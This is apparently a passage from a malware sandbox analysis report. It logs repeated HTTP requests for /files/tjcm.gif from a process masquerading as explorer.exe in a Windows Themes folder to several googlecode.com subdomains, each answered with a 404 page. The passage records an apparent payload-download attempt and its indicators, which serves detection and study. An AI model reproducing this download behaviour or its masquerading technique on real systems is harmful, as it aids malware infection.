                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          69192.168.2.45686166.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:57.728806019 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:58.452804089 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:58 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:58.452830076 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          70192.168.2.45686274.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:58.828869104 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:59.562171936 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:59 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:59.562197924 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          71192.168.2.45686364.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:59.908731937 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:00.575400114 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:00 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:19:00.575424910 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          72192.168.2.45686466.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:19:00.927939892 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:01.652694941 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:01 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:19:01.652767897 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          73192.168.2.45686574.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:19:02.094438076 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:02.919459105 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:02 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:19:02.919480085 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          74192.168.2.45686664.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:19:03.234020948 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:03.967974901 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:03 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:19:03.967992067 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          75192.168.2.45686766.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:19:04.645541906 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:05.383765936 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:05 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
